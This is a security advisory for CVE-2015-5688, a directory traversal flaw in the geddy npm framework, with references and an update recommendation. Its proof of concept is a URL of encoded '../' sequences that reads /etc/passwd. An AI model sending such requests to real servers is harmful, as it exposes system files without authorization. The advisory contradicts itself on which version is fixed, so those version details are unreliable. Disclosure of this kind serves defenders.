CVE-2015-5688
EPSS 81.1%
Directory Traversal in geddy
Published: 10/24/2017
Modified: 11/8/2023
Description
Versions 13.0.8 and earlier of geddy are vulnerable to a directory traversal attack via URI encoded attack vectors.

### Proof of Concept

```
http://localhost:4000/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
```

## Recommendation

Update geddy to version >= 13.0.8
Affected packages (1)
- npm/geddy: from 0, < 13.0.8
References (8)
- ADVISORY: https://github.com/advisories/GHSA-333x-9vgq-v2j4
- ADVISORY: https://nvd.nist.gov/vuln/detail/CVE-2015-5688
- PATCH: https://github.com/geddy/geddy
- WEB: https://github.com/geddy/geddy/commit/2de63b68b3aa6c08848f261ace550a37959ef231
- WEB: https://github.com/geddy/geddy/issues/697
- WEB: https://github.com/geddy/geddy/pull/699
- WEB: https://github.com/geddy/geddy/releases/tag/v13.0.8
- WEB: https://www.npmjs.com/advisories/10